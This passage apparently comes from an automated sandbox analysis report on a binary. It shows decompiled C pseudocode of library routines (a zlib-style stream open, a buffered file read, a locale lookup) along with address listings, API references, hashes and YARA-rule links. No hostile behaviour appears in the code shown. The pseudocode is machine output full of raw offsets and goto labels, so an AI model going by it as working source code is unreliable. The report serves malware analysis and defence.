							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

































                                                                                                                                                                                          0x004057b7
                                                                                                                                                                                          0x004057bf
                                                                                                                                                                                          0x004057c3
                                                                                                                                                                                          0x004057c5
                                                                                                                                                                                          0x004057cd
                                                                                                                                                                                          0x004059c8
                                                                                                                                                                                          0x004059ce
                                                                                                                                                                                          0x004057db
                                                                                                                                                                                          0x004057e3
                                                                                                                                                                                          0x004057e5
                                                                                                                                                                                          0x004057ea
                                                                                                                                                                                          0x00405921
                                                                                                                                                                                          0x0040592a
                                                                                                                                                                                          0x004057f0
                                                                                                                                                                                          0x004057f3
                                                                                                                                                                                          0x004057f6
                                                                                                                                                                                          0x004057f9
                                                                                                                                                                                          0x004057fc
                                                                                                                                                                                          0x004057ff
                                                                                                                                                                                          0x00405801
                                                                                                                                                                                          0x00405804
                                                                                                                                                                                          0x00405807
                                                                                                                                                                                          0x0040580a
                                                                                                                                                                                          0x0040580d
                                                                                                                                                                                          0x00405810
                                                                                                                                                                                          0x00405813
                                                                                                                                                                                          0x00405816
                                                                                                                                                                                          0x00405819
                                                                                                                                                                                          0x0040581c
                                                                                                                                                                                          0x00405824
                                                                                                                                                                                          0x00405827
                                                                                                                                                                                          0x0040582b
                                                                                                                                                                                          0x0040582e
                                                                                                                                                                                          0x00405831
                                                                                                                                                                                          0x00405834
                                                                                                                                                                                          0x00405837
                                                                                                                                                                                          0x00405837
                                                                                                                                                                                          0x00405839
                                                                                                                                                                                          0x0040583a
                                                                                                                                                                                          0x00405842
                                                                                                                                                                                          0x00405847
                                                                                                                                                                                          0x0040584a
                                                                                                                                                                                          0x0040584f
                                                                                                                                                                                          0x0040591c
                                                                                                                                                                                          0x0040591c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405855
                                                                                                                                                                                          0x00405855
                                                                                                                                                                                          0x00405859
                                                                                                                                                                                          0x0040585b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405870
                                                                                                                                                                                          0x00405872
                                                                                                                                                                                          0x00405874
                                                                                                                                                                                          0x00405874
                                                                                                                                                                                          0x00405877
                                                                                                                                                                                          0x0040587b
                                                                                                                                                                                          0x00405881
                                                                                                                                                                                          0x00405881
                                                                                                                                                                                          0x00405885
                                                                                                                                                                                          0x00405889
                                                                                                                                                                                          0x00405897
                                                                                                                                                                                          0x00405899
                                                                                                                                                                                          0x004058a5
                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                          0x004058b3
                                                                                                                                                                                          0x004058b5
                                                                                                                                                                                          0x004058c1
                                                                                                                                                                                          0x004058c5
                                                                                                                                                                                          0x004058c7
                                                                                                                                                                                          0x004058c7
                                                                                                                                                                                          0x004058c8
                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                          0x0040588f
                                                                                                                                                                                          0x00405892
                                                                                                                                                                                          0x00405892
                                                                                                                                                                                          0x004058cc
                                                                                                                                                                                          0x004058cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004058d1
                                                                                                                                                                                          0x004058d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004058db
                                                                                                                                                                                          0x004058db
                                                                                                                                                                                          0x004058e0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004058e2
                                                                                                                                                                                          0x004058e4
                                                                                                                                                                                          0x00405930
                                                                                                                                                                                          0x0040593f
                                                                                                                                                                                          0x00405942
                                                                                                                                                                                          0x00405944
                                                                                                                                                                                          0x00405949
                                                                                                                                                                                          0x0040594c
                                                                                                                                                                                          0x0040594e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405950
                                                                                                                                                                                          0x00405950
                                                                                                                                                                                          0x00405953
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405953
                                                                                                                                                                                          0x004058e6
                                                                                                                                                                                          0x004058ea
                                                                                                                                                                                          0x004058ec
                                                                                                                                                                                          0x004058f1
                                                                                                                                                                                          0x004058f2
                                                                                                                                                                                          0x004058f4
                                                                                                                                                                                          0x004058f6
                                                                                                                                                                                          0x004058f8
                                                                                                                                                                                          0x004058f9
                                                                                                                                                                                          0x00405904
                                                                                                                                                                                          0x00405906
                                                                                                                                                                                          0x0040590b
                                                                                                                                                                                          0x0040590e
                                                                                                                                                                                          0x00405911
                                                                                                                                                                                          0x00405916
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405955
                                                                                                                                                                                          0x00405955
                                                                                                                                                                                          0x00405955
                                                                                                                                                                                          0x00405961
                                                                                                                                                                                          0x00405963
                                                                                                                                                                                          0x00405967
                                                                                                                                                                                          0x0040596d
                                                                                                                                                                                          0x0040596e
                                                                                                                                                                                          0x0040597c
                                                                                                                                                                                          0x0040597d
                                                                                                                                                                                          0x00405970
                                                                                                                                                                                          0x00405970
                                                                                                                                                                                          0x00405974
                                                                                                                                                                                          0x00405975
                                                                                                                                                                                          0x00405975
                                                                                                                                                                                          0x00405985
                                                                                                                                                                                          0x00405988
                                                                                                                                                                                          0x0040598a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040598c
                                                                                                                                                                                          0x0040598c
                                                                                                                                                                                          0x00405990
                                                                                                                                                                                          0x004059a5
                                                                                                                                                                                          0x004059ad
                                                                                                                                                                                          0x004059b6
                                                                                                                                                                                          0x004059b6
                                                                                                                                                                                          0x004059b9
                                                                                                                                                                                          0x004059c5
                                                                                                                                                                                          0x00405992
                                                                                                                                                                                          0x00405992
                                                                                                                                                                                          0x004059a2
                                                                                                                                                                                          0x004059a2
                                                                                                                                                                                          0x00405990
                                                                                                                                                                                          0x0040598a
                                                                                                                                                                                          0x00405916
                                                                                                                                                                                          0x004058e4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405860
                                                                                                                                                                                          0x00405860
                                                                                                                                                                                          0x00405862
                                                                                                                                                                                          0x00405864
                                                                                                                                                                                          0x00405865
                                                                                                                                                                                          0x00405868
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040586a
                                                                                                                                                                                          0x0040586a
                                                                                                                                                                                          0x0040586d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405868
                                                                                                                                                                                          0x0040584f
                                                                                                                                                                                          0x004057ea
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _malloc$AllocateHeap
                                                                                                                                                                                          • String ID: 1.2.3
                                                                                                                                                                                          • API String ID: 680241177-2310465506
                                                                                                                                                                                          • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                                                                                                                                          • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                          • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BCC2, Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                                                                                                                                                                                          0x0040bcc2
                                                                                                                                                                                          0x0040bcca
                                                                                                                                                                                          0x0040bcce
                                                                                                                                                                                          0x0040bcd3
                                                                                                                                                                                          0x0040bcd5
                                                                                                                                                                                          0x0040bcd8
                                                                                                                                                                                          0x0040bcde
                                                                                                                                                                                          0x0040bd01
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bce5
                                                                                                                                                                                          0x0040bce5
                                                                                                                                                                                          0x0040bce7
                                                                                                                                                                                          0x0040bd08
                                                                                                                                                                                          0x0040bd0b
                                                                                                                                                                                          0x0040bd0d
                                                                                                                                                                                          0x0040bd1c
                                                                                                                                                                                          0x0040bd1c
                                                                                                                                                                                          0x0040bd1f
                                                                                                                                                                                          0x0040bd24
                                                                                                                                                                                          0x0040bd29
                                                                                                                                                                                          0x0040bd29
                                                                                                                                                                                          0x0040bd2c
                                                                                                                                                                                          0x0040bd2e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd30
                                                                                                                                                                                          0x0040bd30
                                                                                                                                                                                          0x0040bd35
                                                                                                                                                                                          0x0040bd38
                                                                                                                                                                                          0x0040bd3b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd3d
                                                                                                                                                                                          0x0040bd40
                                                                                                                                                                                          0x0040bd44
                                                                                                                                                                                          0x0040bd4b
                                                                                                                                                                                          0x0040bd4e
                                                                                                                                                                                          0x0040bd50
                                                                                                                                                                                          0x0040bd5a
                                                                                                                                                                                          0x0040bd52
                                                                                                                                                                                          0x0040bd55
                                                                                                                                                                                          0x0040bd55
                                                                                                                                                                                          0x0040bd61
                                                                                                                                                                                          0x0040bd63
                                                                                                                                                                                          0x0040be53
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                          0x0040bd70
                                                                                                                                                                                          0x0040bdb6
                                                                                                                                                                                          0x0040bdb6
                                                                                                                                                                                          0x0040bdb9
                                                                                                                                                                                          0x0040be24
                                                                                                                                                                                          0x0040be2a
                                                                                                                                                                                          0x0040be2d
                                                                                                                                                                                          0x0040beb8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bebe
                                                                                                                                                                                          0x0040be33
                                                                                                                                                                                          0x0040be37
                                                                                                                                                                                          0x0040be87
                                                                                                                                                                                          0x0040be87
                                                                                                                                                                                          0x0040be8b
                                                                                                                                                                                          0x0040be95
                                                                                                                                                                                          0x0040be9a
                                                                                                                                                                                          0x0040be9a
                                                                                                                                                                                          0x0040bea2
                                                                                                                                                                                          0x0040beaa
                                                                                                                                                                                          0x0040beab
                                                                                                                                                                                          0x0040beac
                                                                                                                                                                                          0x0040bead
                                                                                                                                                                                          0x0040beae
                                                                                                                                                                                          0x0040bcf9
                                                                                                                                                                                          0x0040bcf9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bcfe
                                                                                                                                                                                          0x0040be39
                                                                                                                                                                                          0x0040be3c
                                                                                                                                                                                          0x0040be3f
                                                                                                                                                                                          0x0040be44
                                                                                                                                                                                          0x0040be45
                                                                                                                                                                                          0x0040be45
                                                                                                                                                                                          0x0040be45
                                                                                                                                                                                          0x0040be48
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040be48
                                                                                                                                                                                          0x0040bdbb
                                                                                                                                                                                          0x0040bdbf
                                                                                                                                                                                          0x0040bde0
                                                                                                                                                                                          0x0040bde5
                                                                                                                                                                                          0x0040bde7
                                                                                                                                                                                          0x0040bde9
                                                                                                                                                                                          0x0040bde9
                                                                                                                                                                                          0x0040bdc1
                                                                                                                                                                                          0x0040bdc8
                                                                                                                                                                                          0x0040bdca
                                                                                                                                                                                          0x0040bdd7
                                                                                                                                                                                          0x0040bdd7
                                                                                                                                                                                          0x0040bdd7
                                                                                                                                                                                          0x0040bdda
                                                                                                                                                                                          0x0040bdcc
                                                                                                                                                                                          0x0040bdce
                                                                                                                                                                                          0x0040bdd1
                                                                                                                                                                                          0x0040bdd1
                                                                                                                                                                                          0x0040bddc
                                                                                                                                                                                          0x0040bddc
                                                                                                                                                                                          0x0040bdeb
                                                                                                                                                                                          0x0040bdee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bdf4
                                                                                                                                                                                          0x0040bdf4
                                                                                                                                                                                          0x0040bdf5
                                                                                                                                                                                          0x0040bdf9
                                                                                                                                                                                          0x0040bdfe
                                                                                                                                                                                          0x0040bdff
                                                                                                                                                                                          0x0040be00
                                                                                                                                                                                          0x0040be05
                                                                                                                                                                                          0x0040be08
                                                                                                                                                                                          0x0040be0a
                                                                                                                                                                                          0x0040bec6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bec6
                                                                                                                                                                                          0x0040be10
                                                                                                                                                                                          0x0040be13
                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040beb4
                                                                                                                                                                                          0x0040be19
                                                                                                                                                                                          0x0040be1c
                                                                                                                                                                                          0x0040be1e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040be1e
                                                                                                                                                                                          0x0040bdee
                                                                                                                                                                                          0x0040bd72
                                                                                                                                                                                          0x0040bd75
                                                                                                                                                                                          0x0040bd77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd79
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd7f
                                                                                                                                                                                          0x0040bd81
                                                                                                                                                                                          0x0040bd83
                                                                                                                                                                                          0x0040bd85
                                                                                                                                                                                          0x0040bd85
                                                                                                                                                                                          0x0040bd87
                                                                                                                                                                                          0x0040bd8a
                                                                                                                                                                                          0x0040be5b
                                                                                                                                                                                          0x0040be5d
                                                                                                                                                                                          0x0040be61
                                                                                                                                                                                          0x0040be6a
                                                                                                                                                                                          0x0040be6f
                                                                                                                                                                                          0x0040be6f
                                                                                                                                                                                          0x0040be72
                                                                                                                                                                                          0x0040be77
                                                                                                                                                                                          0x0040be78
                                                                                                                                                                                          0x0040be79
                                                                                                                                                                                          0x0040be7a
                                                                                                                                                                                          0x0040be7b
                                                                                                                                                                                          0x0040be81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd90
                                                                                                                                                                                          0x0040bd99
                                                                                                                                                                                          0x0040bd9e
                                                                                                                                                                                          0x0040bda1
                                                                                                                                                                                          0x0040bda3
                                                                                                                                                                                          0x0040bda6
                                                                                                                                                                                          0x0040bda8
                                                                                                                                                                                          0x0040bdab
                                                                                                                                                                                          0x0040bdae
                                                                                                                                                                                          0x0040bdae
                                                                                                                                                                                          0x0040be4b
                                                                                                                                                                                          0x0040be4b
                                                                                                                                                                                          0x0040be4b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd69
                                                                                                                                                                                          0x0040bd63
                                                                                                                                                                                          0x0040bd2e
                                                                                                                                                                                          0x0040bd0f
                                                                                                                                                                                          0x0040bd14
                                                                                                                                                                                          0x0040bd14
                                                                                                                                                                                          0x0040bd17
                                                                                                                                                                                          0x0040bd1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bd1a
                                                                                                                                                                                          0x0040bce9
                                                                                                                                                                                          0x0040bce9
                                                                                                                                                                                          0x0040bcee
                                                                                                                                                                                          0x0040bcef
                                                                                                                                                                                          0x0040bcf0
                                                                                                                                                                                          0x0040bcf1
                                                                                                                                                                                          0x0040bcf2
                                                                                                                                                                                          0x0040bcf8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040bcf8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp Download File
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3886058894-0
                                                                                                                                                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                          • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414738, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}







                                                                                                                                                                                          0x00414738
                                                                                                                                                                                          0x00414738
                                                                                                                                                                                          0x00414738
                                                                                                                                                                                          0x00414738
                                                                                                                                                                                          0x00414738
                                                                                                                                                                                          0x0041473a
                                                                                                                                                                                          0x0041473f
                                                                                                                                                                                          0x00414749
                                                                                                                                                                                          0x0041474b
                                                                                                                                                                                          0x00414753
                                                                                                                                                                                          0x00414777
                                                                                                                                                                                          0x00414779
                                                                                                                                                                                          0x0041477f
                                                                                                                                                                                          0x00414783
                                                                                                                                                                                          0x00414786
                                                                                                                                                                                          0x00414791
                                                                                                                                                                                          0x00414794
                                                                                                                                                                                          0x0041479b
                                                                                                                                                                                          0x00414755
                                                                                                                                                                                          0x00414755
                                                                                                                                                                                          0x00414759
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041475b
                                                                                                                                                                                          0x00414760
                                                                                                                                                                                          0x00414760
                                                                                                                                                                                          0x00414759
                                                                                                                                                                                          0x00414765
                                                                                                                                                                                          0x00414769
                                                                                                                                                                                          0x0041476e
                                                                                                                                                                                          0x00414776

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                            • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                            • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                          • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                          • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
